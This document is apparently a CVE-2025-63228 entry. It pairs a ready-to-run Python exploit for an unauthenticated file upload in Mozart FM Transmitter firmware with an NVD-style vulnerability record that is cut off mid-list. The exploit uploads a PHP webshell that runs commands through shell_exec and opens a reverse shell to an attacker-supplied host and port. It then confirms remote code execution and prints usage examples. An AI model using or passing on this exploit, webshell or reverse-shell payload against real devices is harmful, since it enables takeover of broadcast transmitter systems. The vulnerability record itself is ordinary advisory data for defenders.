CVE-2025-63228

import requests import sys # CVE-2025-63228 PoC - Mozart FM Transmitter Unauthenticated File Upload # Target: Mozart FM Transmitter WEBMOZZI-00287 # Endpoint: /upload_file.php # Impact: Remote Code Execution via PHP Webshell Upload def exploit(target_url, lhost, lport): """ Exploit the unauthenticated file upload vulnerability in Mozart FM Transmitter Args: target_url: Base URL of the target (e.g., http://192.168.1.100) lhost: Attacker IP for reverse shell lport: Attacker port for reverse shell """ # Generate PHP webshell with reverse shell webshell_content = f"""<?php // CVE-2025-63228 - Mozart FM Transmitter Webshell // This webshell provides command execution capability if(isset($_GET['cmd'])) {{ $cmd = $_GET['cmd']; $output = shell_exec($cmd); echo "<pre>$output</pre>"; }} // Reverse shell functionality if(isset($_GET['reverse'])) {{ $sock = fsockopen("{lhost}", {lport}); $proc = proc_open("/bin/sh", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); proc_close($proc); }} ?>""" # Prepare the exploit upload_url = f"{target_url}/upload_file.php" files = { 'file': ('shell.php', webshell_content, 'application/x-php') } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } print(f"[*] Exploiting CVE-2025-63228") print(f"[*] Target: {target_url}") print(f"[*] Uploading webshell to {upload_url}") try: # Send the malicious file upload request (no authentication required) response = requests.post(upload_url, files=files, headers=headers, timeout=10) if response.status_code == 200: # Determine the uploaded file location webshell_url = f"{target_url}/upload/shell.php" print(f"[+] Webshell uploaded successfully!") print(f"[+] Webshell URL: {webshell_url}") print(f"[+] Execute commands via: {webshell_url}?cmd=whoami") print(f"[+] Get reverse shell via: {webshell_url}?reverse=1") # Verify the webshell is accessible verify_response = requests.get(f"{webshell_url}?cmd=echo+CVE-2025-63228", timeout=10) if 'CVE-2025-63228' in verify_response.text: print("[+] Webshell verification successful - RCE achieved!") return True else: print(f"[-] Upload failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <lhost> <lport>") print(f"Example: python {sys.argv[0]} http://192.168.1.100 192.168.1.50 4444") sys.exit(1) target = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] exploit(target, lhost, lport)

{"cve": {"id": "CVE-2025-63228", "sourceIdentifier": "[email protected]", "published": "2025-11-18T20:15:48.090", "lastModified": "2025-12-08T14:44:31.763", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Mozart FM Transmitter web management interface on version WEBMOZZI-00287, contains an unauthenticated file upload vulnerability in the /upload_file.php endpoint. An attacker can exploit this by sending a crafted POST request with a malicious file (e.g., a PHP webshell) to the server. The uploaded file is stored in the /upload/ directory, enabling remote code execution and full system compromise."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_100_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2B25533-2EF5-4158-9505-1CD18463DB68"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_100:-:*:*:*:*:*:*:*", "matchCriteriaId": "7834E460-78EE-456A-84F7-0DECE004BD80"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_1000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "A3497F7E-0433-444B-A58A-A795C8833966"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "FDEB3E77-E3D8-4878-BBE3-74530F3469B4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_2000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "A975C91C-59BD-44AC-9F67-0682CE173738"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_2000:-:*:*:*:*:*:*:*", "matchCriteriaId": "F30F6688-FCDA-4BA5-ABD9-0EB91CDF7631"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_30_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F7B57D15-6192-4D68-9CC5-726E052E7DDD"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_30:-:*:*:*:*:*:*:*", "matchCriteriaId": "EA1C3BA1-3E25-474B-B2A4-97136D6287BA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_300_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F0130D6C-CE17-4046-B0EB-0AD2DA7DC6AC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_300:-:*:*:*:*:*:*:*", "matchCriteriaId": "A04E5386-2B8E-4E5E-9766-CEA4887265D4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_3000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F9F5D088-18AE-4388-83D7-66EBF03B3091"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_3000:-:*:*:*:*:*:*:*", "matchCriteriaId": "E5427DF7-CBAB-4BB9-9175-B7EC7012EAD0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_3500_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "285B4AB4-1F69-445E-B2D3-A0C140B55990"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_3500:-:*:*:*:*:*:*:*", "matchCriteriaId": "90E84970-55F7-41CB-814E-085BACFAAA91"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_50_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "9CD961FB-E86A-4346-9B8D-3658C7BD818F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_50:-:*:*:*:*:*:*:*", "matchCriteriaId": "56699CC2-C823-4397-8C76-BC165E48D6E0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o ... (truncated)